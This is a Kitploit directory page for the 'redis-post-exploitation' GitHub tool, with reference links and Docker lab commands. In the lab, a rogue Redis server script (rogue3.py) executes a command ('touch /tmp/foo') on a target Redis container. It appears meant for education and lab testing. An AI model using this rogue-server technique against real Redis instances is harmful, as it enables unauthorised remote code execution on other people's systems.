Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
redis-post-exploitation | Kitploit
Tools/GitHubGitHub/knqyf263/redis-post-exploitation
Vulnerability AnalysisExploitationPost-ExploitationPenetration TestingLearning & EducationDatabase Security
GitHubknqyf263/redis-post-exploitation

redis-post-exploitation

View Repository
35 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

redis-post-exploitation

For educational purposes only

Reference

  • https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf
  • https://paper.seebug.org/975/

Rogue Server

  • https://github.com/knqyf263/redis-rogue-server

Build

root@kitploit:~
$ docker-compose build

Run

root@kitploit:~
$ docker-compose up -d
$ docker-compose exec rogue sh
root@kitploit:~
/rogue/redis-rogue-server # python3 rogue3.py --rhost redis --rport 6379 --lhost rogue --lport 21000
...
[<<] touch /tmp/foo

Check

root@kitploit:~
$ docker-compose exec redis sh
root@kitploit:~
/data # ls /tmp/
foo
Download Tool